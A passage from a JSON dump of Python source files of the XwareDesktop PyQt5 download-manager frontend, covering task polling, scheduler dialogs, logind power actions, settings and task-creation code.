about what first element means, ignore for now\n\n req = requests.get(self.lcontrol + \"getrunningtaskslimit\")\n maxRunningTasksNum = req.json()[1]\n\n return EtmSetting(dLimit = limits[0], uLimit = limits[1],\n maxRunningTasksNum = maxRunningTasksNum)\n except (ConnectionError, LocalCtrlNotAvailableError):\n return False\n\n def saveSettings(self, newsettings):\n # save limits before disabling\n if newsettings.dLimit != -1:\n app.settings.setint(\"internal\", \"dlspeedlimit\", newsettings.dLimit)\n if newsettings.uLimit != -1:\n app.settings.setint(\"internal\", \"ulspeedlimit\", newsettings.uLimit)\n\n try:\n if newsettings.maxRunningTasksNum:\n requests.post(self.lcontrol +\n \"settings?downloadSpeedLimit={}\"\n \"&uploadSpeedLimit={}\"\n \"&maxRunTaskNumber={}\".format(*newsettings))\n else:\n requests.post(self.lcontrol +\n \"settings?downloadSpeedLimit={}\"\n \"&uploadSpeedLimit={}\".format(newsettings.dLimit,\n newsettings.uLimit))\n except (ConnectionError, LocalCtrlNotAvailableError):\n logging.error(\"trying to set etm settings, but failed.\")\n\n def _requestPollTasks(self, kind): # kind means type, but type is a python reserved word.\n try:\n req = requests.get(self.lcontrol +\n \"list?v=2&type={}&pos=0&number=99999&needUrl=1\".format(kind))\n res = req.content.decode(\"utf-8\")\n result = json.loads(res, cls = _TaskPollingJsonDecoder)\n except (ConnectionError, LocalCtrlNotAvailableError):\n result = None\n return result\n\n def pollTasks(self):\n while True:\n resRunning = self._requestPollTasks(0)\n self.runningTasksStat.update(resRunning)\n\n resCompleted = self._requestPollTasks(1)\n self.completedTasksStat.update(resCompleted)\n\n # emit summary, it doesn't matter using resRunning or resCompleted\n if resRunning is not None:\n self.sigTasksSummaryUpdated[dict].emit(resRunning)\n else:\n self.sigTasksSummaryUpdated[bool].emit(False)\n time.sleep(0.5)\n\n def getActivationStatus(self):\n try:\n req = requests.get(self.lcontrol + \"getsysinfo\")\n res = req.json()\n status = res[3] # 1 - bound, 0 - unbound\n code = res[4]\n except (ConnectionError, LocalCtrlNotAvailableError):\n status = -1 # error\n code = None\n\n userId = app.xwaredpy.userId\n peerId = app.xwaredpy.peerId\n\n result = ActivationStatus(userId, status, code, peerId)\n return result\n\n\nclass TaskStatistic(QObject):\n _tasks = None # copy from _stat_mod upon it's done.\n _tasks_mod = None # make changes to this one.\n\n TASK_STATES = {\n 0: (\"dload\", \"下载中\"),\n 8: (\"wait\", \"等待中\"),\n 9: (\"pause\", \"已停止\"),\n 10: (\"pause\", \"已暂停\"),\n 11: (\"finish\", \"已完成\"),\n 12: (\"delete\", \"下载失败\"),\n 13: (\"finish\", \"上传中\"),\n 14: (\"wait\", \"提交中\"),\n 15: (\"delete\", \"已删除\"),\n 16: (\"delete\", \"已移至回收站\"),\n 37: (\"wait\", \"已挂起\"),\n 38: (\"delete\", \"发生错误\"),\n }\n _initialized = False # when the application starts up, it shouldn't fire.\n\n def __init__(self, parent):\n super().__init__(parent)\n self._tasks = {}\n self._tasks_mod = {}\n\n def getTIDs(self):\n tids = list(self._tasks.keys())\n return tids\n\n def getTask(self, tid):\n try:\n result = self._tasks[tid].copy()\n except KeyError:\n result = dict()\n return result\n\n def getTasks(self):\n return self._tasks.copy()\n\n\nclass CompletedTaskStatistic(TaskStatistic):\n sigTaskCompleted = pyqtSignal(int)\n\n def __init__(self, parent = None):\n super().__init__(parent)\n\n def update(self, data):\n if data is None:\n return\n\n # make a list of id of recent finished tasks\n completed = []\n\n self._tasks_mod.clear()\n for task in data[\"tasks\"]:\n tid = task[\"id\"]\n self._tasks_mod[tid] = task\n\n if tid not in self._tasks:\n completed.append(tid)\n\n self._tasks = self._tasks_mod.copy()\n if self._initialized:\n # prevent already-completed tasks firing sigTaskCompleted\n # when ETM starting later than frontend\n # by comparing `completeTime` with `timestamp`\n # threshold: 10 secs\n timestamp = datetime.timestamp(datetime.now())\n for completedId in completed:\n if 0 <= timestamp - self._tasks[completedId][\"completeTime\"] <= 10:\n self.sigTaskCompleted.emit(completedId)\n else:\n self._initialized = True\n\n\nclass RunningTaskStatistic(TaskStatistic):\n sigTaskNolongerRunning = pyqtSignal(int) # the task finished/recycled/wronged\n sigTaskAdded = pyqtSignal(int)\n SPEEDS_SAMPLES_COUNT = 25\n\n def __init__(self, parent = None):\n super().__init__(parent)\n\n def _getSpeeds(self, tid):\n try:\n result = self._tasks[tid][\"speeds\"]\n except KeyError:\n result = [0] * self.SPEEDS_SAMPLES_COUNT\n return result\n\n @staticmethod\n def _composeNewSpeeds(oldSpeeds, newSpeed):\n return oldSpeeds[1:] + [newSpeed]\n\n def update(self, data):\n if data is None:\n # if data is None, meaning request failed, push speed 0 to all tasks\n for tid, task in self._tasks.items():\n oldSpeeds = self._getSpeeds(tid)\n newSpeeds = self._composeNewSpeeds(oldSpeeds, 0)\n task[\"speeds\"] = newSpeeds\n return\n\n self._tasks_mod.clear()\n for task in data[\"tasks\"]:\n tid = task[\"id\"]\n self._tasks_mod[tid] = task\n\n oldSpeeds = self._getSpeeds(tid)\n newSpeeds = self._composeNewSpeeds(oldSpeeds, task[\"speed\"])\n self._tasks_mod[tid][\"speeds\"] = newSpeeds\n\n prevTaskIds = set(self.getTIDs())\n currTaskIds = set(self._tasks_mod.keys())\n\n nolongerRunning = prevTaskIds - currTaskIds\n added = currTaskIds - prevTaskIds\n\n self._tasks = self._tasks_mod.copy()\n if self._initialized:\n for nolongerRunningId in nolongerRunning:\n self.sigTaskNolongerRunning.emit(nolongerRunningId)\n for addedId in added:\n self.sigTaskAdded.emit(addedId)\n else:\n self._initialized = True\n"
},
{
"alpha_fraction": 0.5911853909492493,
"alphanum_fraction": 0.5992907881736755,
"avg_line_length": 31.899999618530273,
"blob_id": "ce5afc47dacf0707d5749828b6418991c65b085a",
"content_id": "a9c910a6ad3a96b876ef4a4373f9db23d6a3119d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2016,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 60,
"path": "/src/frontend/Schedule/SchedulerCountdown.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import QTimer, Qt, pyqtSlot\nfrom PyQt5.QtWidgets import QMessageBox\n\n\nclass CountdownMessageBox(QMessageBox):\n _timeout = None\n _timer = None\n _actionStr = None\n\n def __init__(self, actionStr):\n self._actionStr = actionStr\n super().__init__(QMessageBox.Question, # icon\n \"Xware Desktop任务完成\", # title\n \"\",\n QMessageBox.NoButton, # buttons\n getattr(app, \"mainWin\", None), # parent\n Qt.Dialog | Qt.WindowStaysOnTopHint)\n self.setAttribute(Qt.WA_DeleteOnClose)\n # Note: setting WindowModality cancels StaysOnTop\n # self.setWindowModality(Qt.ApplicationModal)\n\n # Due to a possible Qt Bug, the reject button must be added first.\n # https://bugreports.qt-project.org/browse/QTBUG-37870\n self.rejectBtn = self.addButton(\"取消\", QMessageBox.RejectRole)\n self.acceptBtn = self.addButton(\"立刻执行\", QMessageBox.AcceptRole)\n\n self._timeout = 60\n self.updateText()\n self._timer = QTimer(self)\n self._timer.timeout.connect(self.slotTick)\n self._timer.start(1000) # one tick per second\n\n @pyqtSlot()\n def slotTick(self):\n print(\"Scheduler countdown tick...\", self._timeout)\n if self._timeout > 0:\n self._timeout -= 1\n self.updateText()\n else:\n self.accept()\n\n def updateText(self):\n self.setText(\"任务已完成。将于{}秒后{}。\".format(self._timeout, self._actionStr))\n\n @pyqtSlot()\n def accept(self):\n print(\"Scheduler confirmation accepted\")\n app.scheduler.sigActionConfirmed.emit(True) # act\n super().accept()\n\n @pyqtSlot()\n def reject(self):\n print(\"Scheduler confirmation rejected\")\n app.scheduler.sigActionConfirmed.emit(False) # reset\n super().reject()\n"
},
{
"alpha_fraction": 0.6213592290878296,
"alphanum_fraction": 0.6601941585540771,
"avg_line_length": 19.600000381469727,
"blob_id": "0c74916aab451c2280bfe06a4b59ea00a3625f05",
"content_id": "36c2c54fe773c9c307901aac396d59f3fe34b6fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 206,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 10,
"path": "/src/shared/__init__.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\n\n__version__ = \"0.11\"\n\nXWARE_VERSION = \"1.0.27\"\n\nfrom collections import namedtuple\nBackendInfo = namedtuple(\"BackendInfo\", [\"etmPid\", \"lcPort\", \"userId\", \"peerId\"])\n"
},
{
"alpha_fraction": 0.5719636082649231,
"alphanum_fraction": 0.5751739144325256,
"avg_line_length": 31.224138259887695,
"blob_id": "fbe8ff23028bebde759e5d9077e664e1efa29a32",
"content_id": "35cd444693583100857c11c1a1aba1d488cfac6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3760,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 116,
"path": "/src/frontend/Schedule/PowerAction.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import QObject\nfrom PyQt5.QtDBus import QDBusConnection, QDBusInterface\n\nimport os\n\n_DBUS_POWER_SERVICE = \"org.freedesktop.login1\"\n_DBUS_POWER_PATH = \"/org/freedesktop/login1\"\n_DBUS_POWER_INTERFACE = \"org.freedesktop.login1.Manager\"\n\nACTION_NONE = 0\nACTION_POWEROFF = 1\nACTION_HYBRIDSLEEP = 2\nACTION_HIBERNATE = 3\nACTION_SUSPEND = 4\n\n\nclass PowerAction(object):\n # defines a power action\n manager = None\n actionId = None\n displayName = None\n internalName = None\n availability = None\n command = None\n\n def __init__(self, manager, actionId, displayName, internalName):\n super().__init__()\n self.manager = manager\n self.actionId = actionId\n self.displayName = displayName\n self.internalName = internalName\n\n if self.actionId == ACTION_NONE:\n # always allow doing nothing\n availability = \"yes\"\n command = None\n else:\n optionKey = self.internalName.lower() + \"cmd\"\n if app.settings.has(\"scheduler\", optionKey):\n # override action with command\n availability = \"cmd\"\n command = app.settings.get(\"scheduler\", optionKey)\n # TODO: check if the command is bad.\n else:\n # use the default action, namely logind.\n # needs to check for availability\n msg = self.manager._interface.call(\"Can\" + self.internalName)\n availability = msg.arguments()[0]\n command = None\n\n self.availability = availability\n self.command = command\n\n def __repr__(self):\n contents = [\n \"{}({})\".format(self.internalName, self.actionId),\n self.availability,\n ]\n if self.command is not None:\n contents.append(self.command)\n\n return \"{cls}<{contents}>\".format(\n cls = self.__class__.__name__,\n contents = \":\".join(contents))\n\n\nclass PowerActionManager(QObject):\n # manages power actions, and act them.\n _conn = None\n _interface = None\n actions = None\n\n def __init__(self, parent = None):\n super().__init__(parent)\n self._conn = QDBusConnection(\"Xware Desktop\").systemBus()\n self._interface = QDBusInterface(_DBUS_POWER_SERVICE,\n _DBUS_POWER_PATH,\n _DBUS_POWER_INTERFACE,\n self._conn)\n\n self.actions = (\n PowerAction(self, ACTION_NONE, \"无\", \"None\"),\n PowerAction(self, ACTION_POWEROFF, \"关机\", \"PowerOff\"),\n PowerAction(self, ACTION_HYBRIDSLEEP, \"混合休眠\", \"HybridSleep\"),\n PowerAction(self, ACTION_HIBERNATE, \"休眠\", \"Hibernate\"),\n PowerAction(self, ACTION_SUSPEND, \"睡眠\", \"Suspend\"),\n )\n logging.info(self.actions)\n\n def getActionById(self, actionId):\n return self.actions[actionId]\n\n def act(self, actionId):\n action = self.getActionById(actionId)\n if action.command:\n return self._cmdAct(action)\n elif action.availability == \"yes\":\n return self._dbusAct(action)\n raise Exception(\"Unhandled {}\".format(action))\n\n def _dbusAct(self, action):\n logging.info(\"scheduler is about to act: {}\".format(action))\n msg = self._interface.call(action.internalName,\n False)\n if msg.errorName():\n logging.error(msg.errorMessage())\n\n @staticmethod\n def _cmdAct(action):\n logging.info(\"scheduler is about to execute: {}\".format(action))\n os.system(action.command)\n"
},
{
"alpha_fraction": 0.6732240319252014,
"alphanum_fraction": 0.6765027046203613,
"avg_line_length": 27.59375,
"blob_id": "1dd848e80bfc58ced15df1272ca2e07e17677f11",
"content_id": "93393a57a1704947a51882b46416bf683d7fdd62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 923,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 32,
"path": "/src/frontend/Schedule/SchedulerButton.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtGui import QIcon\n\nfrom Schedule.SchedulerWin import SchedulerWindow\nfrom CustomStatusBar.CStatusButton import CustomStatusBarButton\n\n\nclass SchedulerButton(CustomStatusBarButton):\n def __init__(self, parent):\n super().__init__(parent)\n self.setIcon(QIcon(\":/image/clock.png\"))\n self.updateText()\n app.scheduler.sigSchedulerSummaryUpdated.connect(self.updateText)\n self.clicked.connect(self.slotClicked)\n\n @pyqtSlot()\n def slotClicked(self):\n app.mainWin.schedulerWin = SchedulerWindow(app.mainWin)\n app.mainWin.schedulerWin.show()\n\n def updateText(self):\n summary = app.scheduler.getSummary()\n if type(summary) is str:\n self.setText(summary)\n else:\n # True / False\n self.setText(\"计划任务\")\n"
},
{
"alpha_fraction": 0.637686550617218,
"alphanum_fraction": 0.6399253606796265,
"avg_line_length": 34.26315689086914,
"blob_id": "4109e5b2b08c935a4023ef93b772861e5958132f",
"content_id": "518321faaf3974c2649feb7b3060dcad7fb52aa4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2680,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 76,
"path": "/src/frontend/Schedule/SchedulerWin.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import pyqtSlot, Qt\nfrom PyQt5.QtWidgets import QDialog, QListWidgetItem\n\nfrom .ui_scheduler import Ui_Dialog\nimport Schedule\n\n\nclass SchedulerWindow(QDialog, Ui_Dialog):\n scheduler = None\n\n def __init__(self, parent = None):\n super().__init__(parent)\n self.setupUi(self)\n self.setAttribute(Qt.WA_DeleteOnClose)\n\n self.scheduler = app.scheduler\n self.loadFromScheduler()\n\n def loadFromScheduler(self):\n # actWhen ComboBox\n for row, pair in enumerate(self.scheduler.POSSIBLE_ACTWHENS):\n self.comboBox_actWhen.addItem(pair[1])\n self.comboBox_actWhen.setItemData(row, pair[0])\n\n self.slotActWhenChanged(self.scheduler.actWhen)\n self.comboBox_actWhen.setCurrentIndex(self.scheduler.actWhen)\n self.comboBox_actWhen.activated[int].connect(self.slotActWhenChanged)\n\n # tasks list\n runningTasks = app.etmpy.runningTasksStat.getTasks()\n waitingTaskIds = self.scheduler.waitingTaskIds\n for rTaskId, rTask in runningTasks.items():\n item = QListWidgetItem(rTask[\"name\"])\n item.setData(Qt.UserRole, rTaskId)\n self.listWidget_tasks.addItem(item)\n\n # must be set before being added\n if rTaskId in waitingTaskIds:\n item.setSelected(True)\n else:\n item.setSelected(False)\n\n # action comboBox\n selectedIndex = None\n for action in self.scheduler.actions:\n if action.command or action.availability == \"yes\":\n self.comboBox_action.addItem(action.displayName)\n row = self.comboBox_action.count() - 1\n self.comboBox_action.setItemData(row, action.actionId)\n if self.scheduler.actionId == action.actionId:\n selectedIndex = row\n self.comboBox_action.setCurrentIndex(selectedIndex)\n\n @pyqtSlot(int)\n def slotActWhenChanged(self, choice):\n if choice == Schedule.ALL_TASKS_COMPLETED:\n self.listWidget_tasks.setEnabled(False)\n elif choice == Schedule.SELECTED_TASKS_COMPLETED:\n self.listWidget_tasks.setEnabled(True)\n else:\n raise Exception(\"Unknown Scheduler actWhen\")\n\n @pyqtSlot()\n def accept(self):\n actWhen = self.comboBox_actWhen.currentData()\n taskIds = set(map(lambda item: item.data(Qt.UserRole),\n self.listWidget_tasks.selectedItems()))\n actionId = self.comboBox_action.currentData()\n\n self.scheduler.set(actWhen, taskIds, actionId)\n self.close()\n"
},
{
"alpha_fraction": 0.7797619104385376,
"alphanum_fraction": 0.7857142686843872,
"avg_line_length": 27,
"blob_id": "b217ff55bfab3aab6e5d5629cf930fb20f3d4960",
"content_id": "cc9bcc0903486b770374d4cb91b2ef7843aaa1fe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 168,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 6,
"path": "/src/frontend/Settings/__init__.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom .menu import SettingMenu\nfrom .accessor import SettingsAccessor\nfrom .defaults import DEFAULT_SETTINGS\nfrom .dialog import SettingsDialog\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6705653071403503,
"avg_line_length": 29.176469802856445,
"blob_id": "11e077d46b99fcb3a55adcaafd76ddb01bcc2a68",
"content_id": "2840f8036b20394e21d1365e836ef35b5aafe21d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 513,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 17,
"path": "/src/frontend/Settings/accessor.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import pyqtSignal, QObject\nfrom shared.config import SettingsAccessorBase\n\n\nclass SettingsAccessor(QObject, SettingsAccessorBase):\n applySettings = pyqtSignal()\n\n def __init__(self, parent, configFilePath, defaultDict):\n super().__init__(QObject_parent = parent,\n configFilePath = configFilePath,\n defaultDict = defaultDict)\n app.aboutToQuit.connect(self.save)\n"
},
{
"alpha_fraction": 0.671875,
"alphanum_fraction": 0.6875,
"avg_line_length": 20.33333396911621,
"blob_id": "42bd41c15b0b3e25e3d7a3afabd1a807be9c2384",
"content_id": "a7e0fbd95e0c8d416ea248e877c841f730c77feb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 64,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 3,
"path": "/src/frontend/Widgets/__init__.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom .QuickView import CustomQuickView\n"
},
{
"alpha_fraction": 0.5850815773010254,
"alphanum_fraction": 0.5888111591339111,
"avg_line_length": 29.863309860229492,
"blob_id": "c5a85bd1af907f625d221c927d24179cdbc99280",
"content_id": "95541efa236cdbd5ed4d075f43ed81cb21fc2981",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4290,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 139,
"path": "/src/frontend/models/TaskManager.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# -*- coding: utf-8 -*-\n\nimport asyncio\nimport collections\nfrom functools import partial\nfrom itertools import islice\n\nfrom PyQt5.QtCore import QModelIndex\n\n\nclass TaskManager(collections.MutableMapping):\n def __init__(self, model):\n self._mapNamespaces = collections.defaultdict(list) # {\"xware-0123\": [0, 1, 2, 3], ...}\n self._stash = {}\n self._maps = []\n self._model = model\n\n # Disable some methods that are expected in a dict.\n def __setitem__(self, key, value):\n raise NotImplementedError()\n\n def __delitem__(self, key):\n raise NotImplementedError()\n\n def copy(self):\n raise NotImplementedError()\n\n def keys(self):\n raise NotImplementedError()\n\n def values(self):\n raise NotImplementedError()\n\n def items(self):\n raise NotImplementedError()\n\n def __getitem__(self, key):\n # faster than ChainMap's implementation\n ns = key.split(\"|\")[0]\n for nsmap in self._mapsForNamespace(ns):\n try:\n result = nsmap[key]\n return result\n except KeyError:\n pass\n raise KeyError(\"key {} cannot be found.\".format(key))\n\n def __iter__(self):\n for map_ in self._maps:\n yield from map_\n\n def __len__(self):\n return sum(map(len, self._maps))\n\n def __contains__(self, key):\n # faster than ChainMap's implementation\n ns = key.split(\"|\")[0]\n return any(key in nsmap for nsmap in self._mapsForNamespace(ns))\n\n # Custom implementation\n def _mapsForNamespace(self, ns):\n return (self._maps[mapId] for mapId in self._mapNamespaces[ns])\n\n def _baseIndexForMap(self, mapId):\n assert mapId <= len(self._maps)\n return sum(map(len, self._maps[:mapId]))\n\n def at(self, index: \"uint\"):\n assert index >= 0, \"index = {}\".format(index)\n for mapId in range(len(self._maps)):\n mapLIndex = self._baseIndexForMap(mapId)\n mapRIndex = mapLIndex + len(self._maps[mapId]) - 1\n if mapRIndex >= index:\n inmapIndex = index - mapLIndex\n itr = islice(self._maps[mapId].values(), inmapIndex, inmapIndex + 1)\n result = next(itr)\n return result\n raise IndexError(\"Out of range: index({})\".format(index))\n\n @asyncio.coroutine\n def appendMap(self, map_):\n # All tasks from all backends live in a same chainmap, therefore id needs to be prefixed\n\n if not isinstance(map_, collections.OrderedDict):\n raise ValueError(\"Can only register OrderedDict\")\n\n namespace = getattr(map_, \"adapter\").namespace\n if not namespace:\n raise ValueError(\"Map must have a namespace property\")\n\n assert not bool(map_), \"Map must be empty before registering\"\n\n mapId = len(self._maps)\n self._maps.append(map_)\n\n # implement map's model related methods\n map_.beforeInsert = partial(self.beforeInsert, mapId)\n map_.afterInsert = self.afterInsert\n map_.beforeDelete = partial(self.beforeDelete, mapId)\n map_.moveToStash = self.moveToStash\n map_.afterDelete = self.afterDelete\n\n self._mapNamespaces[namespace].append(mapId)\n return mapId\n\n def updateMap(self, mapId, updating):\n self._maps[mapId].updateData(updating)\n\n def beforeInsert(self, mapId, key) -> {False: \"deferred\",\n True: \"goahead\",\n \"item\": \"Found key in stash\"}:\n if key in self:\n print(\"deferred\", key)\n return False\n baseIndex = self._baseIndexForMap(mapId)\n size = len(self._maps[mapId])\n i = baseIndex + size\n\n self._model.sigBeforeInsert.emit(i)\n\n return self._stash.pop(key, True)\n\n def afterInsert(self):\n self._model.sigAfterInsert.emit()\n\n def beforeDelete(self, mapId, index):\n baseIndex = self._baseIndexForMap(mapId)\n i = baseIndex + index\n\n self._model.beginRemoveRows(QModelIndex(), i, i)\n return True\n\n def moveToStash(self, item):\n self._stash[item.id] = item\n\n def afterDelete(self):\n self._model.endRemoveRows()\n"
},
{
"alpha_fraction": 0.6769230961799622,
"alphanum_fraction": 0.692307710647583,
"avg_line_length": 20.66666603088379,
"blob_id": "5012141a5a3a9fee48658c67fb41de12e45cf108",
"content_id": "f6e7b25d023b659055c458b9060a097c6b5197a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 65,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 3,
"path": "/src/frontend/libxware/__init__.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom .adapter import XwareAdapterThread\n"
},
{
"alpha_fraction": 0.621728777885437,
"alphanum_fraction": 0.6308485269546509,
"avg_line_length": 31.753246307373047,
"blob_id": "dc59cdb3d3ac638989258bf3e598b677bac89b20",
"content_id": "fd00ea279ff8aa7ccd1b1116865b948328e42fb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2522,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 77,
"path": "/src/frontend/morula.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport os, sys\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../\"))\n\nfrom PyQt5.QtCore import QUrl, QSize\nfrom PyQt5.QtQuick import QQuickView\nfrom PyQt5.QtGui import QGuiApplication\n\nfrom Widgets import CustomQuickView\n\nimport constants\n\n\nclass QmlMain(CustomQuickView):\n def __init__(self, parent):\n super().__init__(parent)\n app = QGuiApplication.instance()\n\n self.setTitle(\"Xware Desktop with QML (experimental)\")\n self.setResizeMode(QQuickView.SizeRootObjectToView)\n self.qmlUrl = QUrl.fromLocalFile(os.path.join(constants.FRONTEND_DIR, \"QML/Main.qml\"))\n self.rootContext().setContextProperty(\"adapters\", app.adapterManager)\n self.rootContext().setContextProperty(\"taskModel\", app.proxyModel)\n self.setSource(self.qmlUrl)\n self.resize(QSize(800, 600))\n\n\nclass DummyApp(QGuiApplication):\n def __init__(self, *args):\n super().__init__(*args)\n\n from models import TaskModel, AdapterManager, ProxyModel\n from libxware import XwareAdapterThread\n\n self.taskModel = TaskModel()\n self.proxyModel = ProxyModel()\n self.proxyModel.setSourceModel(self.taskModel)\n\n self.adapterManager = AdapterManager()\n self.xwareAdapterThread = XwareAdapterThread({\n \"host\": \"127.0.0.1\",\n \"port\": 9000,\n })\n self.xwareAdapterThread.start()\n\n self.qmlWin = QmlMain(None)\n self.qmlWin.show()\n\nfrom PyQt5.QtCore import QtMsgType, QMessageLogContext, QtDebugMsg, QtWarningMsg, QtCriticalMsg, \\\n QtFatalMsg\n\n\ndef installQtMsgHandler(msgType: QtMsgType, context: QMessageLogContext, msg: str):\n strType = {\n QtDebugMsg: \"DEBUG\",\n QtWarningMsg: \"WARN\",\n QtCriticalMsg: \"CRITICAL\",\n QtFatalMsg: \"FATAL\"\n }[msgType]\n\n print(\"Qt[{strType}] {category} {function} in {file}, on line {line}\\n\"\n \" {msg}\".format(strType = strType,\n category = context.category,\n function = context.function,\n file = context.file,\n line = context.line,\n msg = msg),\n file = sys.stdout if msgType in (QtDebugMsg, QtWarningMsg) else sys.stderr)\n\n\nif __name__ == \"__main__\":\n from PyQt5.QtCore import qInstallMessageHandler\n qInstallMessageHandler(installQtMsgHandler)\n app = DummyApp(sys.argv)\n sys.exit(app.exec())\n"
},
{
"alpha_fraction": 0.6151692271232605,
"alphanum_fraction": 0.6177144050598145,
"avg_line_length": 30.43199920654297,
"blob_id": "bbe5bdbd807396552f4d930a5cee5f9390901cf2",
"content_id": "66989dc5e13f39643f73c4e2e88f56dc2a892a06",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3929,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 125,
"path": "/src/frontend/Tasks/action.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import QObject, pyqtSlot\n\nimport sys\nfrom urllib import parse\n\nfrom frontendpy import FrontendAction\nfrom utils import misc\nfrom .mimeparser import UrlExtractor\nfrom .watchers.clipboard import ClipboardWatcher\nfrom .watchers.commandline import CommandlineWatcher\n\n\nclass CreateTasksAction(FrontendAction):\n _tasks = None # tasks to add in the same batch\n\n def __init__(self, tasks):\n super().__init__()\n self._tasks = tasks\n\n def __repr__(self):\n return \"{} {}\".format(self.__class__.__name__, self._tasks)\n\n def consume(self):\n taskUrls = list(map(lambda task: task.url, self._tasks))\n if self._tasks[0].kind == CreateTask.NORMAL:\n app.frontendpy.sigCreateTasks.emit(taskUrls)\n else:\n app.mainWin.page.overrideFile = taskUrls[0]\n app.frontendpy.sigCreateTaskFromTorrentFile.emit()\n\n\nclass CreateTask(object):\n NORMAL = 0\n LOCAL_TORRENT = 1\n\n url = None\n kind = None\n\n def __init__(self, url = None, kind = None):\n self.url = url\n\n if kind is None:\n kind = self.NORMAL\n self.kind = kind\n\n def __repr__(self):\n return \"{} <{}>\".format(self.__class__.__name__, self.url)\n\n\nclass TaskCreationAgent(QObject):\n _urlExtractor = None\n\n def __init__(self, parent = None):\n super().__init__(parent)\n # hold a reference to the parent, aka frontendpy.\n # when the program is launched, app.frontendpy would be None.\n self._frontendpy = parent\n tasks = sys.argv[1:]\n if tasks:\n self.createTasksAction(tasks)\n\n self._urlExtractor = UrlExtractor(self)\n app.sigMainWinLoaded.connect(self.connectUI)\n\n # load watchers\n self._clipboardWatcher = ClipboardWatcher(self)\n self._commandlineWatcher = CommandlineWatcher(self)\n\n @pyqtSlot()\n def connectUI(self):\n app.mainWin.action_createTask.triggered.connect(self.createTasksAction)\n\n def createTasksFromMimeData(self, data):\n # This method only checks text data.\n urls = self._urlExtractor.extract(data.text())\n if len(urls) > 0:\n self.createTasksAction(urls)\n\n @pyqtSlot()\n @pyqtSlot(list)\n def createTasksAction(self, taskUrls = None):\n if taskUrls:\n alltasks = self._filterInvalidTasks(map(self._createTask, taskUrls))\n tasks = list(filter(lambda task: task.kind == CreateTask.NORMAL, alltasks))\n tasks_localtorrent = list(filter(lambda task: task.kind == CreateTask.LOCAL_TORRENT,\n alltasks))\n else:\n # else\n tasks = self._filterInvalidTasks([self._createTask()])\n tasks_localtorrent = []\n\n if tasks:\n self._frontendpy.queueAction(CreateTasksAction(tasks))\n for task_bt in tasks_localtorrent: # because only 1 bt-task can be added once.\n self._frontendpy.queueAction(CreateTasksAction([task_bt]))\n\n @staticmethod\n def _filterInvalidTasks(tasks):\n # remove those urls which were not recognized by self._createTask\n return list(filter(lambda t: t is not None, tasks))\n\n @staticmethod\n def _createTask(taskUrl = None):\n if taskUrl is None:\n return CreateTask()\n\n if taskUrl.startswith(\"file://\"):\n taskUrl = taskUrl[len(\"file://\"):]\n\n parsed = parse.urlparse(taskUrl)\n if parsed.scheme in (\"thunder\", \"flashget\", \"qqdl\"):\n url = 